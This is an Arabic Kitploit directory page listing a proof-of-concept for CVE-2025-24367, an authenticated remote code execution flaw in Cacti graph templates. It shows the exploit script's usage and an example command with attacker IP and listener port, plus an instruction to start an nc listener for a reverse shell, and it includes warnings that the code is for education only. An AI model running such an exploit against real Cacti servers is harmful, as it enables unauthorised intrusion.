Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24367-Cacti-PoC — إثبات المفهوم لـ CVE-2025-24367 | Kitploit
أدوات/GitHubGitHub/thecybergeek/cve-2025-24367-cacti-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubthecybergeek/cve-2025-24367-cacti-poc

CVE-2025-24367-Cacti-PoC

إثبات المفهوم لـ CVE-2025-24367

عرض المستودع
374منذ 8 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-24367 - ثغرة تنفيذ الأوامر عن بعد في قالب الرسم المصادق عليه في Cacti

الاستخدام والأمان

هام — اقرأ هذا أولاً:
هذا المستودع وملف exploit.py مقدمان لأغراض تعليمية وبحثية فقط. لا تستخدم هذا الكود ضد أنظمة أو شبكات أو خدمات ليس لديك تصريح كتابي صريح لاختبارها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني وغير أخلاقي. باستخدام هذا الكود فإنك توافق على اتباع القوانين المعمول بها والسياسات المؤسسية.


المتطلبات

  • Python 3.8+
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4

الاستخدام

root@kitploit:~
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]

مثال

قبل تشغيل السكريبت تأكد من أن لديك مستمع nc يعمل. قم بتشغيل السكريبت بدون وكيل إلا عند التصحيح:

root@kitploit:~
python3 exploit.py \
  -u testuser \
  -p Welcome1 \
  -i 192.168.43.11 \
  -l 4444 \
  -url http://localhost

تحذيرات مهمة جداً

  • لا تقم بتشغيل هذا ضد أنظمة الإنتاج أو أي نظام لا تملكه أو ليس لديك تصريح صريح لاختباره.
  • احصل دائمًا على تصريح كتابي قبل إجراء اختبارات الأمان.
  • استخدم بيئات مختبرية معزولة (مثل الأجهزة الافتراضية، الحاويات، أو شبكات الاختبار المخصصة) للتجربة.
  • قد يكون لدى مؤسستك سياسات للإبلاغ والكشف — اتبعها.
  • لا يتحمل المؤلفون أي مسؤولية عن إساءة استخدام هذا الكود.

تذكير أخير: هذا السكريبت وملف README مخصصان للاستخدام التعليمي فقط. لا تستخدم هذه الأدوات أبدًا للوصول غير القانوني إلى الأنظمة.

تنزيل الأداة